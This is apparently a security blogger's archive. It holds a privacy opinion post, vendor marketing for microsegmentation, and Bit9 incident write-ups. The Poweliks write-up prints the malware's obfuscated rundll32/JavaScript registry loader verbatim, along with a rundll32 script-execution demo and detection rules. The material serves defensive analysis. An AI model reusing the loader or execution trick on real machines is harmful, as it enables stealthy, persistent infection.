It’s Not Your Data! Turn Off All Your Facebook Privacy Settings

There are lots of folks decrying the Facebook “breach”, where a third party company abused the terms of service and leeched a bunch of data to the seemingly shady Cambridge Analytica. I love how people are referring to this as “their private data being stolen”. IT’S NOT YOUR DATA.


Well, at least not in the United States. In the US, when you give your private data to a company, it’s no longer private with the exception of healthcare data (HIPAA), children’s data (COPPA), and some credit data (FACTA). So, when you logged into Facebook and told them all the things you like, you gave them that data.

The true deception here is Facebook’s “privacy” setting. It gives you the false pretense that it’s your data to decide what you want to do with it. Google, Microsoft, Apple, just about everyone has created this false pretense, and we all gleefully ignore that there are no legal protections in the United States about this so-called private data.

I have an easy solution! Turn off all the privacy settings. Set everything to public. Don’t fool yourself into a false sense of privacy. If you want to be private, don’t post it on social media.

You should think of three people before sharing something online: your mother, your boss, and your kid. If any of those three people shouldn’t see it, then it shouldn’t be posted.

I’m not saying that online privacy doesn’t exist. The US does protect private information that is meant to stay private between one party and another, and in other situations covered by a patchwork of laws.

I’m also not saying that online privacy shouldn’t exist. I consider myself a privacy advocate. All the actions we take online leave a digital trail. Facebook and others are notorious for tracking as much of that trail as possible. I think there are great dangers when insurance firms and financial firms use social media tracking data to make risk-based decisions. What about our offline activities? If a firm is using license plate scanners to build marketable data, where are our privacy rights then?

Worried about Facebook and other social media sites tracking you? I highly recommend Privacy Badger from the Electronic Frontier Foundation.

If we want to change the way we treat data, we have to be honest with ourselves about what is real privacy protection and what merely makes us feel safe. Social media sites make money off the data you provide them. Other companies and even governments are using that data. Use social media with eyes wide open.

Once you accept the truth, then you have the power to decide what to share, and what to keep private.


What is Microsegmentation?

Last week Gartner published the Top 10 Technologies for Information Security in 2016.  In that list, they include microsegmentation, a term many security professionals are unaware of.  This is exciting for me at Drawbridge Networks, since PathProtect is the only technology on the market that provides microsegmentation for the entire enterprise, securing traffic workstation to workstation, workstation to server, and server to server.

To put it simply, microsegmentation is the ability to do two things:

  1. Identify network traffic based on something more than layer 4 information, i.e. user, application, etc.
  2. Control network traffic using that additional information in a policy driven manner.

The biggest need for this technology is for east/west traffic, i.e. not traversing a firewall, router, and/or switch.

First, some history

When TCP/IP and Ethernet were gaining a foothold as the networking platform of choice over token ring and others, it was easy to map OSI layers to devices (need an OSI refresher?).  Hubs were layer 1, switches were layer 2, routers were layer 3, and firewalls were layer 4.  If you wanted to divide a network into two IP segments, you used a router.  If you wanted to segment your network by port, you used a firewall.  If you wanted to move a computer from one network segment to another, you walked down to the communication closet and moved the cable from one switch to another.

Then, in the 90s, came the Virtual Local Area Network (VLAN).  Broadcast storms were a real pain and segmenting with routers was cost limiting.  VLANs were a solution to this broadcast problem, but the new flexibility and ease of being able to segment on the fly became quite popular.  This popularity bred multifunction network devices such as layer 3 switches.

By the late 90s, we had cost effective switches with routing capabilities.  The security capabilities of these multifunction devices increased to include Access Control Lists (ACLs), Private VLANs, etc. Creating network segments was no longer bounded by cost.  Routers also started expanding past layer 3 to be able to do port based ACLs.  As we entered into the 2000s, stateful firewalls were also being built into single multifunction devices.

All of this was a great advancement for security, but even today many enterprises are still stuck segmenting at OSI layer 4 and below with just IP and port.  Essentially, all network architecture and segmentation schemes are built with this limitation as a core design principle.  Security innovation continued, but instead of advancing segmentation techniques, network security vendors seemed to change their focus to layer 7 inspection and building “appliances”.  Unfortunately, you cannot have an appliance everywhere in your network.

Beyond Layer 4 – How to Get Microsegmentation

There are many shortcomings to only using IP and port as a way to segment your network for security.  The primary tool used by most today, VLANs, was never built with security in mind, only to reduce broadcast traffic.  ACLs help control traffic, but most enterprises have decades-old ACLs that are costly to manage.  Attackers are able to move around from endpoint to workstation with impunity.  We have to control the east/west traffic flow to effectively secure our networks.

Here are the current technologies that enable microsegmentation:

Network Function Virtualization (NFV)

As the popularity of OS virtualization developed, hardware based networking devices were a limiting factor in the flexibility and scalability virtualization had to offer.  From that need sprung Network Function Virtualization or NFV.

NFV is a new label on what has been developing for the last 10-15 years, which is building software that provides the same functionality as networking devices.  In 2012 the European Telecommunications Standards Institute (ETSI) dedicated a group to start producing standards for NFV.

Because of the flexibility a virtual networking device can offer, microsegmentation has been added to that list of capabilities.  The most prominent method is to “tag” traffic with a proprietary tag.  Then other NFV devices from that vendor can respond to that tag to control the network traffic according to a policy.

Note: ETSI has not published a standard or draft for microsegmentation, so each NFV vendor will have implementation differences.


Software Defined Networking (SDN)

Paralleling the development of NFV was a movement to get beyond centralized network orchestration and have true centralized management with a programmatic interface.  A new concept emerged: separating the control plane, the basic switching/routing functions, from the management plane.  This separation of logical functions is what is known as Software Defined Networking (SDN) today.

As the last decade was coming to a close, SDN gained its footing.  2011 saw the founding of the Open Networking Foundation and the first release of OpenFlow. This standard has paved the way to make multiplatform SDN a reality.  That hasn’t stopped some big vendors from creating their own “standard”, like Cisco’s Open Network Environment.

SDN has a lot of promise, including the ability to perform microsegmentation in a similar manner to the NFV implementations.  However, SDN is not an easy thing to implement.  The value that it brings makes it worth the cost if you are a cloud or data center provider.  For most enterprises, the cost of implementation far outweighs the benefits.

Enterprise Microsegmentation

NFV and SDN are promising technologies and are currently reshaping data centers. However, attackers often target endpoint workstations as an initial point of compromise. Spear phishing emails with malicious links and attachments are used to gain a foothold, and then attackers move laterally from workstation to workstation in search of valuable hosts such as those used by DBAs or IT Systems Administrators.

Microsegmentation of endpoint workstations might prevent those infections from spreading laterally, but there are definitive shortcomings when microsegmentation is implemented in the network using technologies like SDN.  There are certain things that you cannot see from the network, like what process sent that network traffic?  What user started that process?

PathProtect takes a different approach.  Instead of trying to reengineer your entire network, PathProtect uses endpoint agents to understand the context of the network data. These endpoint agents are easy to deploy, and provide information about all of the lateral communications going on in the network as well as the process and user context associated with them.  Then, using a policy based engine, PathProtect can control who can do what, performing enforcement at each endpoint.  This way, PathProtect decouples the network policy from the physical architecture of the network itself, allowing for instant reconfiguration of segments on the fly.

PathProtect uses mutual endpoint authorization to ensure that the client sending the traffic is authorized to do so and that the server is authorized to accept the traffic.  This can provide your enterprise with a default-deny posture.  If an attacker were to walk into your office and plug in his own laptop, no workstation or server would respond.

Just like a drawbridge, both sides must be open to allow traffic to pass.
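The mutual, default-deny authorization described above can be sketched as a small policy engine. This is an added example written for this post, not PathProtect code: each host runs an agent with its own outbound and inbound rules keyed on user and process context, and a flow is permitted only when the sender’s agent allows it and the receiver’s agent accepts it. Host names, users and process names below are constructed for illustration.

```python
from dataclasses import dataclass
from typing import Dict, Iterable, Union

@dataclass(frozen=True)
class Flow:
    """One east/west connection attempt, enriched with endpoint context."""
    src_host: str
    src_user: str
    src_process: str
    dst_host: str
    dst_port: int

@dataclass(frozen=True)
class Rule:
    """A match pattern; "*" is a wildcard for any field."""
    src_host: str = "*"
    src_user: str = "*"
    src_process: str = "*"
    dst_host: str = "*"
    dst_port: Union[int, str] = "*"

    def matches(self, flow: Flow) -> bool:
        pairs = [
            (self.src_host, flow.src_host),
            (self.src_user, flow.src_user),
            (self.src_process, flow.src_process),
            (self.dst_host, flow.dst_host),
            (self.dst_port, flow.dst_port),
        ]
        return all(p == "*" or str(p).lower() == str(v).lower() for p, v in pairs)

class EndpointPolicy:
    """Rules an agent enforces on its own host: what it may send and what it will accept."""
    def __init__(self, host: str, outbound: Iterable[Rule] = (), inbound: Iterable[Rule] = ()):
        self.host = host
        self.outbound = list(outbound)
        self.inbound = list(inbound)

    def allows_outbound(self, flow: Flow) -> bool:
        return flow.src_host == self.host and any(r.matches(flow) for r in self.outbound)

    def accepts_inbound(self, flow: Flow) -> bool:
        return flow.dst_host == self.host and any(r.matches(flow) for r in self.inbound)

def mutually_authorized(flow: Flow, policies: Dict[str, EndpointPolicy]) -> bool:
    """Default deny: both the sending and the receiving agent must say yes.
    A host with no agent (an unmanaged laptop plugged into the office) has no
    policy entry, so nothing it sends is authorized and nothing answers it."""
    sender = policies.get(flow.src_host)
    receiver = policies.get(flow.dst_host)
    if sender is None or receiver is None:
        return False
    return sender.allows_outbound(flow) and receiver.accepts_inbound(flow)

# Constructed policies: a DBA workstation may reach the database only from sqlcmd.exe
# as user alice; the database accepts only that same context on port 1433.
POLICIES = {
    "ws-alice": EndpointPolicy(
        "ws-alice",
        outbound=[Rule(src_host="ws-alice", src_user="alice", src_process="sqlcmd.exe",
                       dst_host="db01", dst_port=1433)],
    ),
    "db01": EndpointPolicy(
        "db01",
        inbound=[Rule(src_host="ws-alice", src_user="alice", src_process="sqlcmd.exe",
                      dst_host="db01", dst_port=1433)],
    ),
    "ws-bob": EndpointPolicy("ws-bob"),  # managed host with no inbound rules: accepts nothing
}

def evaluate_samples() -> Dict[str, bool]:
    """Run a few constructed flows through the engine; keys describe the scenario."""
    return {
        "dba_sqlcmd_to_db": mutually_authorized(
            Flow("ws-alice", "alice", "sqlcmd.exe", "db01", 1433), POLICIES),
        "same_user_other_process": mutually_authorized(
            Flow("ws-alice", "alice", "powershell.exe", "db01", 1433), POLICIES),
        "lateral_to_workstation": mutually_authorized(
            Flow("ws-alice", "alice", "sqlcmd.exe", "ws-bob", 445), POLICIES),
        "unmanaged_laptop": mutually_authorized(
            Flow("rogue-laptop", "guest", "sqlcmd.exe", "db01", 1433), POLICIES),
    }

if __name__ == "__main__":
    for scenario, allowed in evaluate_samples().items():
        print(f"{scenario}: {'ALLOW' if allowed else 'DENY'}")
```

The process field is what makes this more than a layer 4 ACL: the same user on the same host is denied when a different program opens the connection, which a network-side device cannot distinguish.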


Gartner has brought to light the new security concept of microsegmentation and highlighted its importance. There’s no need to invest in network rearchitecture to start controlling your east/west traffic.  For a fraction of the time, and a fraction of the price, you can implement microsegmentation today.

Following Poweliks Strike, Custom Bit9 Rule Offers Key Insight and Blocks Infection

I wrote this blog post for the Bit9 Blog; it was published on January 21st, 2015.


I love to hear stories about how our customers use our products. I previously wrote about a global services firm that used Bit9 to connect the dots to get to the bottom of an Internet Explorer exploit. This same company sent me the following story to show a particularly useful rule they created in Bit9:

“We wound up getting hit by a Poweliks variant pretty badly shortly after I originally emailed you, where 44 users who were in full lockdown mode had to have their computers reimaged (At that time the majority of anti-malware tools didn’t detect that malware, let alone clean it). Fortunately, we identified what was happening fairly quickly thanks to the Bit9 agent, and we were able to put a custom rule in place in Bit9 to identify users who were infected or were in the initial stage of infection. Without Bit9 installed we wouldn’t have even been able to identify who was infected, let alone prevent the payload from executing.”

Somewhere along the way, the computers that had to be reimaged acquired the following registry entry:

rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktdsjqu/fodpef?(,)ofx!BdujwfYPckfdu)(XTdsjqu/Tifmm(**/SfhSfbe)(ILDV]]tpguxbsf]]dmbttft]]dmtje]]|bc9:13c5.1:db.5cc7.c89e.b9g6:18:b9e6~]]mpdbmtfswfs43]]b(*,(=0tdsjqu?(*".replace(/./g,function(_){return%20String.fromCharCode(_.charCodeAt()-1);})) –Embedding

Once the above code executed, it would

  1. Spawn an instance of PowerShell
  2. Spawn a dllhost (or many dllhosts)
  3. Connect to up to five different Russian IP addresses, and then it would
  4. Initiate the usual malware behavior

Pretty clever!
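The `eval(...)` in that registry entry only looks like gibberish because every character has been shifted up by one code point; the trailing `.replace(/./g, ...)` shifts it back before running it. An analyst can undo that transform without executing anything. This decoder is an added example for this post, not part of the original or of Bit9’s tooling; the encoded string is copied verbatim from the registry entry above, and the regular expression that pulls out registry paths is my own addition.

```python
import re
from typing import List

# Encoded payload copied verbatim from the eval("...") in the registry entry quoted above.
ENCODED = (
    "epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktdsjqu/fodpef?(,)ofx!BdujwfYPckfdu)("
    "XTdsjqu/Tifmm(**/SfhSfbe)(ILDV]]tpguxbsf]]dmbttft]]dmtje]]"
    "|bc9:13c5.1:db.5cc7.c89e.b9g6:18:b9e6~]]mpdbmtfswfs43]]b(*,(=0tdsjqu?(*"
)

def shift_decode(text: str, delta: int = -1) -> str:
    """Apply the same per-character shift the JavaScript replace() callback does:
    String.fromCharCode(c.charCodeAt() - 1) for every character."""
    return "".join(chr(ord(c) + delta) for c in text)

def extract_registry_paths(decoded: str) -> List[str]:
    """Pull HKCU/HKLM paths out of decoded script text so they can be used as
    indicators (persistence location to inspect on other hosts)."""
    paths = re.findall(r"HK(?:CU|LM)[^']+", decoded)
    # The decoded text is JavaScript source, so backslashes are doubled; collapse them.
    return [p.replace("\\\\", "\\") for p in paths]

def analyze(encoded: str = ENCODED) -> dict:
    """Decode and summarize what the script does, without running it."""
    decoded = shift_decode(encoded)
    return {
        "decoded": decoded,
        "uses_wscript_shell": "WScript.Shell" in decoded,
        "reads_registry": ".RegRead(" in decoded,
        "registry_paths": extract_registry_paths(decoded),
    }

if __name__ == "__main__":
    result = analyze()
    print(result["decoded"])
    for path in result["registry_paths"]:
        print("persistence location:", path)
```

Running it shows that the script builds a `<script>` tag from a value read out of an `HKCU\software\classes\clsid\{...}` key, which is why the infection survived reboots without leaving a file on disk for the anti-malware tools of the day to scan.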

I wouldn’t have guessed that rundll32 would be able to execute JavaScript code, but if you are curious to see for yourself, try executing the following:

rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";alert('RaawwwrrrrRRrrr');


Fortunately, rundll32.exe doesn’t usually launch PowerShell, so we were able to quickly identify infected users by using the following Bit9 rule:


The rule would then block PowerShell from executing, thereby preventing the computer from becoming completely infected. We then ran a report based on files being blocked by the rule to identify the infected users.

In the end, the exercise provided the fuel that I needed to convince management to approve an installation of a Carbon Black server for even greater visibility.


Scan-based Forensics Solutions Are for Cavemen

I wrote this blog post for the Bit9 Blog; it was published on January 15, 2015.


I had the opportunity to work with a global services firm that had some problems with malware on machines that were running Bit9. They were running Bit9 in “High Enforcement” mode, so the infection was being blocked, but they wanted to get to the source of the attack, since it was creating some noise in their SIEM.

At that point the customer only had a few clues. They knew there was something creating a task in c:\windows\system32\tasks that was named with a GUID (e.g., {462BD9BA-4D27-EA09-F2AC-704C4DDA8D16}).

That task would then attempt to run regsvr32.exe to register a dll file in c:\windows\system32. The dll files they encountered were named using five to six alpha characters. In one example, the ssaxxo.dll file dropped into the c:\windows\system32 directory.

The files seemed to have unique hashes, but they were all detected as known malware. When the dll file got dropped into the C:\windows\system32 directory, another file with a different name appeared in the c:\windows\syswow64 folder as well. Both of the dll files appeared to have been generated by rundll32.exe.

It was confirmed that their antivirus of choice did not detect this threat, while Bit9 did.

However, without more context, all they knew was that they had a vulnerability somewhere. The question was: “Where?”

At this point, the customer sent us the logs to review and collaboratively find the source of the exploit. Our Bit9 Threat Research Team jumped in, and it didn’t take long to assess the issue.

Internet Explorer was being exploited.

An IE exploit was used to drop the first dll file, create the scheduled task, and then pass the dll file to rundll32.exe. Rundll32 then created the file they discovered, and the scheduled task attempts to register it via regsvr32.exe, which is blocked by Bit9. The scheduled task is set to keep trying every 10 minutes.
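Both this incident and the Poweliks case in the previous post were spotted through a parent/child relationship that should not happen on a healthy workstation: rundll32.exe launching PowerShell there, and here a GUID-named scheduled task driving regsvr32.exe at a short, random-looking DLL in system32. The following is an added example (my own code, not the Bit9 rule or a Carbon Black query) that expresses both observations as checks over process-creation events; the event fields and the sample events are constructed for illustration, with the task name and DLL name taken from this post.

```python
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

@dataclass
class ProcessEvent:
    """Minimal process-creation record as an endpoint sensor would report it."""
    parent_image: str
    image: str
    command_line: str
    task_name: Optional[str] = None  # set when the Task Scheduler started the process

GUID_RE = re.compile(r"^\{[0-9A-Fa-f]{8}(?:-[0-9A-Fa-f]{4}){3}-[0-9A-Fa-f]{12}\}$")
SHORT_ALPHA_DLL_RE = re.compile(r"^[A-Za-z]{5,6}\.dll$")
DLL_ARG_RE = re.compile(r'"?([A-Za-z]:\\[^"\s]+\.dll)"?', re.IGNORECASE)
SYSTEM_DIRS = (r"c:\windows\system32", r"c:\windows\syswow64")

def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def dirname(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[0].lower()

def rundll32_spawns_powershell(ev: ProcessEvent) -> bool:
    """Previous post: rundll32.exe does not normally launch PowerShell."""
    return basename(ev.parent_image) == "rundll32.exe" and basename(ev.image) == "powershell.exe"

def guid_task_registers_short_dll(ev: ProcessEvent) -> bool:
    """This post: a GUID-named scheduled task running regsvr32.exe against a
    5-6 letter DLL dropped into system32 or syswow64."""
    if basename(ev.image) != "regsvr32.exe":
        return False
    if not ev.task_name or not GUID_RE.match(ev.task_name):
        return False
    m = DLL_ARG_RE.search(ev.command_line)
    if not m:
        return False
    dll = m.group(1)
    return dirname(dll) in SYSTEM_DIRS and SHORT_ALPHA_DLL_RE.match(basename(dll)) is not None

RULES = [
    ("rundll32_spawns_powershell", rundll32_spawns_powershell),
    ("guid_task_registers_short_dll", guid_task_registers_short_dll),
]

def triage(events: List[ProcessEvent]) -> List[Tuple[str, str]]:
    """Return (rule name, command line) for every event that matches a rule."""
    hits = []
    for ev in events:
        for name, check in RULES:
            if check(ev):
                hits.append((name, ev.command_line))
    return hits

# Constructed sample events: two that reproduce the patterns in the posts, two benign.
SAMPLE_EVENTS = [
    ProcessEvent(r"C:\Windows\System32\rundll32.exe",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 "powershell.exe"),
    ProcessEvent(r"C:\Windows\explorer.exe",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 "powershell.exe"),
    ProcessEvent(r"C:\Windows\System32\svchost.exe", r"C:\Windows\System32\regsvr32.exe",
                 r"regsvr32.exe /s c:\windows\system32\ssaxxo.dll",
                 task_name="{462BD9BA-4D27-EA09-F2AC-704C4DDA8D16}"),
    ProcessEvent(r"C:\Windows\System32\svchost.exe", r"C:\Windows\System32\regsvr32.exe",
                 r'regsvr32.exe /s "C:\Program Files\Vendor\vendorlib.dll"',
                 task_name="Vendor Update Registration"),
]

if __name__ == "__main__":
    for rule, cmd in triage(SAMPLE_EVENTS):
        print(f"[{rule}] {cmd}")
```

Both checks are relationship checks, not hash checks, which is the point of the story: the DLLs had unique hashes on every host, but the task name shape, the drop location and the parent process were constant.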

As we were going through this exercise, the customer wished they also were running Carbon Black.

That’s because he knew from a recent demo that Carbon Black can do this type of analysis in seconds. There is no need to review log files to connect the dots; Carbon Black assembles that data for you and is available with just a few clicks. Plus, with Carbon Black, the customer would have known which IP address was exploiting them.

This ability to connect the dots is because the Bit9 Security Platform and Carbon Black operate in real time at the kernel layer. Products that merely perform file scans cannot deliver this level of visibility.

I think back on my days doing forensics on disk images and it seems like caveman days. It still surprises me that organizations are still buying scan-based forensic software in what is very much a real-time threat landscape.

Interesting Read: ParanoiDF – PDF Analysis & Password Cracking Tool

As I browse the internet, I find security news that I find interesting. Here is one such article:

ParanoiDF – PDF Analysis & Password Cracking Tool

Original article from Darknet – The Darkside
Original article posted on August 13, 2014 at 11:15AM

Interesting Read: Your PC or laptop may have a backdoor enabled by default, millions do

As I browse the internet, I find security news that I find interesting. Here is one such article:

Your PC or laptop may have a backdoor enabled by default, millions do

Computrace software, which is enabled by default on millions of PCs, could allow an attacker to remotely wipe the hard drive. Researchers described the "backdoor" in BIOS/UEFI, as well as how it can be exploited, at Black Hat USA. Although the suggested threat mitigation is to deactivate Computrace, that’s not always possible.

Original article from Computerworld Blogs – Security
Original article posted on August 13, 2014 at 10:03AM

Interesting Read: How Hackable Is Your Car? Consult This Handy Chart

As I browse the internet, I find security news that I find interesting. Here is one such article:

How Hackable Is Your Car? Consult This Handy Chart

Last year, when hackers Charlie Miller and Chris Valasek showed they could hijack the steering and brakes of a Ford Escape and a Toyota Prius with nothing but laptops connected to the cars, they raised two questions: Could hackers perform the same tricks wirelessly, or even over the Internet? And even more pressing: Is your […]

Original article from WIRED » Threat Level
Original article posted on August 06, 2014 at 06:30AM